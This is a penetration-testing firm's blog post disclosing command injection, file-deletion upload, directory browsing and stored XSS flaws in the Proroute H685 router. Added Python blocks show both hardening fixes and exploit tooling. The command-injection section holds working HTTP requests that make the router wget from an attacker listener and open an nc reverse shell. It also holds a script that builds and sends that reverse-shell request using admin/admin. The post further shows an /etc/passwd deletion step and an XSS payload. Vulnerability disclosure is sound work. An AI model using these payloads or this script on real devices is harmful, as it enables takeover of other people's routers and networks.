When penetration testing career and hobby collide: IoT testing


30-11-2021


Penetration testers take penetration testing very seriously; so much so that for many it is both a career and a hobby. When they take off their work hat and put on their leisure hat, not much changes. The upside is that vulnerabilities in the everyday items we use get found, and our information stays secure a little longer. That matters because threat actors spend a fair amount of time looking for the non-obvious entry points that are only found through a lot of trial and error.

The team decided to share a few of their IoT tests to highlight that we still have a long way to go when it comes to making the small things as secure as the big things.

In this example, we look at the Proroute H685 4G router, which you may find in many homes (and even offices) because it offers high speed 4G mobile broadband internet connectivity.

After testing and finding several vulnerabilities, we contacted Proroute to inform them. We let them know that we would publish our findings, allowing them time to issue a patch.

Non-technical overview

For our non-technical readers (who are still interested in learning about the vulnerabilities), we found:

  1. Command injection vulnerability – This can allow an attacker to execute arbitrary commands on an operating system, which can result in an attacker gaining complete control.
  2. Insecure file upload vulnerability – This can allow an attacker to upload a malicious file to a system, which can result in a malware infection.
  3. Information disclosure vulnerability – Websites and devices with this vulnerability unintentionally leak information (such as technical details which would give an attacker the information they needed to launch their attack).
  4. Cross-Site Scripting (XSS) vulnerability – This lets an attacker plant malicious script in a trusted web page so that it runs in the browser of anyone who views that page, allowing the attacker to act as that user or to alter what they see.

Now for the technical part:

1.  Command Injection:

The application has an authenticated command injection vulnerability. An attacker can leverage this to gain remote command execution on the host, taking control of the system and running any command the legitimate owner could.

This vulnerability arises in the Lua script named ‘sms_send.lua’. As the screenshot below shows, the ‘number’ and ‘text’ parameters are passed unsanitised to the ‘luci.util.exec’ function, which runs the resulting string through the system shell. This insecure handling of user-supplied data leads to remote command execution on the host.

For an attacker to exploit this, the victim’s device must have the SMS Gateway enabled and the attacker must know a valid set of credentials (for this example the credentials were set to username = admin and password = admin).
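The flaw in sms_send.lua, as an added example that is not part of the original post or of Proroute’s firmware: a Python stand-in for the Lua handler, with the vulnerable construction beside a hardened one. The page does not show which command sms_send.lua actually runs, so ‘echo’ stands in for it here (an assumption that makes the difference observable); the allow-list patterns, the argv construction and the shlex quoting are our suggested fix, not the vendor’s.

```python
import re
import shlex
import subprocess
from typing import List

# Stand-in for the device's SMS-sending binary (assumption: the real command
# behind sms_send.lua is not shown on the page). "echo" simply reflects its
# arguments so the effect of each construction is visible.
SMS_TOOL = "echo"

# Allow-lists: an optional '+' then 1-15 digits for the number, and printable
# ASCII only for the text. Validation narrows the input; it is the argv
# construction below that actually removes the shell from the picture.
NUMBER_RE = re.compile(r"^\+?[0-9]{1,15}$")
TEXT_RE = re.compile(r"^[\x20-\x7e]{1,160}$")


def vulnerable_send(number: str, text: str) -> str:
    """Mirrors sms_send.lua: user input is concatenated into one command string
    and handed to a shell (luci.util.exec uses io.popen, i.e. /bin/sh -c)."""
    command = f"{SMS_TOOL} {number} {text}"
    result = subprocess.run(["sh", "-c", command], capture_output=True, text=True)
    return result.stdout.strip()


def validate(number: str, text: str) -> None:
    """Reject anything outside the expected shape before it goes anywhere."""
    if not NUMBER_RE.match(number):
        raise ValueError("invalid phone number")
    if not TEXT_RE.match(text):
        raise ValueError("invalid message text")


def hardened_argv(number: str, text: str) -> List[str]:
    """Validate, then build an argv list. With no shell involved, $(...),
    backticks, ';' and '|' inside the text are data, not syntax."""
    validate(number, text)
    return [SMS_TOOL, number, text]


def hardened_send(number: str, text: str) -> str:
    result = subprocess.run(hardened_argv(number, text), capture_output=True, text=True)
    return result.stdout.strip()


def shell_quoted_command(number: str, text: str) -> str:
    """If a shell string is unavoidable (for instance keeping luci.util.exec),
    quote every user-controlled argument. luci.util.shellquote does the same
    job on the Lua side."""
    validate(number, text)
    return " ".join([SMS_TOOL, shlex.quote(number), shlex.quote(text)])


if __name__ == "__main__":
    payload = "j$(echo INJECTED)"   # same shape as the page's PoC payload
    print("vulnerable:", vulnerable_send("1", payload))  # substitution runs
    print("hardened:  ", hardened_send("1", payload))    # payload stays literal
```

Note that the payload passes the text allow-list: it is all printable ASCII. Filtering alone would not have saved the router; what removes the injection is never letting the shell parse user data, or quoting it if the shell cannot be avoided.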

Proof of concept

Below are two examples relating to this vulnerability.  Example 1 will show that the ‘wget’ command can run on the remote device. Example 2 shows how this can be leveraged to gain a remote shell on the device.

To facilitate both examples, a netcat listener is started on the attacker’s host (192.168.8.111) on port 9090 to accept incoming connections.

Example 1:

Below is the request that will take advantage of the vulnerability and force the host to perform a ‘wget’ to the netcat listener.

POST /cgi-bin/sms_send HTTP/1.1
Host: 192.168.8.1
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 88

username=admin&password=admin&number=1&text=j$(`wget%20http://192.168.8.111:9090/test`)

Once sent, checking the netcat listener shows that the remote device has connected to it.

Example 2:

Below is the request that will take advantage of the vulnerability and force the host to establish a reverse shell with the netcat listener.

POST /cgi-bin/sms_send HTTP/1.1
Host: 192.168.8.1
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 151

username=admin&password=admin&number=1&text=j$(`rm%20/tmp/f;mknod%20/tmp/f%20p;cat%20/tmp/f|/bin/sh%20-i%202>%261|nc%20192.168.8.111%209090%20>/tmp/f`)

Once sent, checking the netcat listener shows that the remote device has connected and an interactive shell is available.
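To reproduce the two requests above against a device you own, the following added example (our tooling, not code from the original post) builds the POST body with standard form-encoding and a Content-Length computed from the encoded body, instead of hand-editing a captured request. It uses only the addresses and ports from the page. A single $(...) wrapper is all the shell needs to run the command; the extra backticks in the page’s payloads are not required.

```python
import socket
from urllib.parse import urlencode

ROUTER = "192.168.8.1"                  # target address from the page
LHOST, LPORT = "192.168.8.111", 9090    # attacker's netcat listener from the page


def wget_probe(lhost: str, lport: int) -> str:
    """Example 1: make the router fetch a URL from the listener, which proves
    that commands execute without needing a shell back."""
    return f"wget http://{lhost}:{lport}/test"


def reverse_shell(lhost: str, lport: int, fifo: str = "/tmp/f") -> str:
    """Example 2: the named-pipe reverse shell used on the page. The FIFO feeds
    /bin/sh whatever nc receives, and nc sends the shell's output back."""
    return (f"rm {fifo};mknod {fifo} p;cat {fifo}|/bin/sh -i 2>&1"
            f"|nc {lhost} {lport} >{fifo}")


def inject(command: str, prefix: str = "j") -> str:
    """Wrap a command in $(...) so the shell runs it when the 'text' field is
    concatenated into the command line. The leading character keeps the field
    non-empty, as in the page's PoC."""
    return f"{prefix}$({command})"


def build_request(host: str, username: str, password: str, number: str, text: str) -> bytes:
    """Raw HTTP POST to /cgi-bin/sms_send. urlencode percent-encodes the shell
    metacharacters; the CGI decodes them before the Lua script sees them."""
    body = urlencode({"username": username, "password": password,
                      "number": number, "text": text})
    headers = [
        "POST /cgi-bin/sms_send HTTP/1.1",
        f"Host: {host}",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body)}",
        "Connection: close",
    ]
    return ("\r\n".join(headers) + "\r\n\r\n" + body).encode()


def send_raw(host: str, request: bytes, port: int = 80, timeout: float = 10) -> bytes:
    """Deliver the request over a plain TCP socket and return the raw response."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    # Start `nc -lvnp 9090` on LHOST first, then run this against a device you own.
    req = build_request(ROUTER, "admin", "admin", "1", inject(reverse_shell(LHOST, LPORT)))
    print(req.decode())
    # print(send_raw(ROUTER, req).decode(errors="replace"))
```

The listener side is the unchanged netcat from the page; only the request construction is automated here.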

2.  Insecure file upload

This issue is present in the image upload function of the OEM section of the application. An attacker can use this functionality to overwrite or remove key system files on the host, causing a denial of service (DoS) in which the device no longer operates as intended.

For an attacker to achieve this, they need valid credentials for the OEM section of the application. This reduces the attack surface somewhat, but default and weak passwords are common on such devices.

Proof of concept

For this example we targeted the passwd file in the /etc directory. It was chosen because losing it has an obvious and detrimental effect on the web service. Before performing the proof of concept, we took a copy of the file so that it could be restored afterwards.

Inside of the ‘OEM Configuration’ section there is the ‘picture configuration’ section.

Click the icon with the eye. Capturing the request in Burp Suite shows its parameters.

Send the request to Repeater and find the parameter named ‘cbid.sys.picture.logo’.

Change its value to ‘/etc/passwd’ and click Send; this removes the ‘passwd’ file.

Once the page is refreshed, the following Lua error message is shown:

Listing the /etc directory via SSH confirms the file has been deleted:

Copying the saved passwd file back reverses the change:

3.  Information disclosure

The device allows authenticated users to browse the device’s folder structure. This issue arises from the ‘filebrowser.lua’ file. It could result in information leaking through the file and directory names that become visible.

For an attacker to access this leaked information, all they need is valid credentials for the web application, which are often left at defaults or are easy to guess.

Proof of concept

The examples below show that the ‘filebrowser’ section allows files and folders to be listed. Note that during testing it was not possible to read any of the files, only to navigate the structure. Even so, it would not take an attacker long to find a workaround.
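Both the OEM logo parameter in the previous section and the filebrowser endpoint here take a path from the user and hand it to the filesystem. The following added example (ours, not Proroute’s code) shows in Python how such parameters should be confined: the logo setting accepts only a bare image file name, and browsing is pinned to an explicit root, with ‘..’ traversal and symlinks that point outside the root both rejected. The allowed extensions and the directory layout in demo() are constructed for illustration, not taken from the device.

```python
import os
import re
import tempfile
from typing import List

# Only bare image file names are acceptable for the OEM logo. The real
# handler's permitted extensions are unknown; these are illustrative (assumption).
LOGO_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(png|jpe?g|gif)$", re.IGNORECASE)


class PathRejected(ValueError):
    """Raised when a user-supplied path would leave its sandbox."""


def safe_logo_path(upload_dir: str, name: str) -> str:
    """The logo parameter must name a file *within* the upload directory,
    never an arbitrary system path such as /etc/passwd."""
    if not LOGO_NAME_RE.match(name):
        raise PathRejected(f"logo name {name!r} is not a plain image file name")
    return os.path.join(os.path.realpath(upload_dir), name)


def confine(root: str, requested: str) -> str:
    """Resolve 'requested' relative to 'root' and prove the result stays under
    root. realpath collapses '..' and follows symlinks, so a link inside the
    root that points outside it is caught as well."""
    if os.path.isabs(requested):
        raise PathRejected("absolute paths are not allowed")
    root_real = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root_real, requested))
    if os.path.commonpath([root_real, target]) != root_real:
        raise PathRejected(f"{requested!r} escapes {root}")
    return target


def list_browsable(root: str, requested: str = ".") -> List[str]:
    """What a filebrowser endpoint should do: list only inside an explicit
    root (for example a data directory), never the whole filesystem."""
    return sorted(os.listdir(confine(root, requested)))


def demo() -> dict:
    """Exercise the checks in a throwaway directory tree constructed here."""
    results = {}
    with tempfile.TemporaryDirectory() as base:
        root = os.path.join(base, "www")
        os.makedirs(os.path.join(root, "logos"))
        open(os.path.join(root, "logos", "logo.png"), "w").close()
        open(os.path.join(base, "secret"), "w").close()   # lives outside the root
        os.symlink(base, os.path.join(root, "escape"))      # symlink pointing out
        results["logo_ok"] = os.path.basename(safe_logo_path(root, "logo.png"))
        results["listing"] = list_browsable(root, "logos")
        for attempt in ("/etc/passwd", "../../etc/passwd", "logo.png;rm -rf /"):
            try:
                safe_logo_path(root, attempt)
                results[attempt] = "accepted"
            except PathRejected:
                results[attempt] = "rejected"
        for attempt in ("../secret", "escape/secret", "/etc"):
            try:
                list_browsable(root, attempt)
                results[attempt] = "accepted"
            except PathRejected:
                results[attempt] = "rejected"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key!r}: {value}")
```

The comparison is done on resolved paths rather than on the string the user sent, which is why the symlink case and the ‘..’ case fail the same check.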

4.  Cross Site Scripting (XSS)

The device is susceptible to a stored cross-site scripting vulnerability. An authenticated attacker can submit a malicious payload to the ‘sms_send’ endpoint; it is then executed whenever the stored message is read back through the ‘sms_list’ endpoint. This allows a third party to modify the content of the web interface as seen by other users.

For an attacker to achieve this, the SMS Gateway must be enabled and they must know a valid set of credentials (for this example the credentials were set to username = admin and password = admin).

Proof of concept

When the malicious request below is submitted to the ‘sms_send’ endpoint, the content is saved in its logs.

POST /cgi-bin/sms_send HTTP/1.1
Host: 192.168.8.1
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

username=admin&password=admin&number=1&text=j<script>alert(0)</script>

Requesting the ‘sms_list’ endpoint retrieves these logs and renders them on screen without encoding the data, causing the malicious JavaScript to execute in the browser of whoever views the list.
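The rendering step that turns a stored message into a script, beside the output-encoding fix, as an added example that is not code from the original post or from the device: a Python stand-in for what sms_list does with its stored messages. The stored sample is constructed from the page’s PoC payload; the device’s real storage format is not shown and is not assumed here.

```python
import html
from typing import Iterable, Tuple

# Constructed sample of what the SMS log might hold after the page's PoC
# request. The device's real storage format is unknown (assumption).
STORED_SMS = [
    ("1", "j<script>alert(0)</script>"),
    ("+441234567890", "Meter reading: 42 <ok>"),
]


def render_sms_list_unsafe(messages: Iterable[Tuple[str, str]]) -> str:
    """Mirrors the flaw: stored text is dropped straight into the HTML, so a
    stored <script> runs in the browser of every administrator who opens the list."""
    rows = "".join(f"<tr><td>{number}</td><td>{text}</td></tr>"
                   for number, text in messages)
    return f"<table>{rows}</table>"


def render_sms_list_safe(messages: Iterable[Tuple[str, str]]) -> str:
    """Fix: encode every untrusted value for the HTML context it lands in.
    html.escape turns <, >, &, and both quote characters into entities, so the
    browser displays the payload as text instead of parsing it as markup.
    Encoding on output also protects messages stored before the fix shipped."""
    rows = "".join(
        f"<tr><td>{html.escape(number, quote=True)}</td>"
        f"<td>{html.escape(text, quote=True)}</td></tr>"
        for number, text in messages
    )
    return f"<table>{rows}</table>"


def contains_live_script(rendered: str) -> bool:
    """Deliberately crude check for the demonstration: a raw <script> tag in
    the output means the payload would execute."""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print("unsafe:", render_sms_list_unsafe(STORED_SMS))
    print("safe:  ", render_sms_list_safe(STORED_SMS))
```

The encoding belongs at the point of output, not at the point of input: the same stored text may later be emitted into an attribute, a JavaScript string or JSON, and each context needs its own encoder.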

To wrap up

This device has a number of vulnerabilities that compromise its security and therefore the security of user data. They may be mitigated by firmware updates, but for those who do not patch, these problems will persist until the device is removed from the network.

As you may have seen in the media over the last few years, the security standards that are supposed to keep consumer IoT devices safe have not yet matured or been enforced, and this situation is likely to continue. Proroute is far from the only vendor with such issues; we have seen far worse from other manufacturers. However, consumers trust us as an industry to provide mature solutions, and we need to consider the sustainability of releasing devices with fundamental flaws.

Talk to us about penetration testing: sales@pgitl.com or +44 (0)845 600 4403
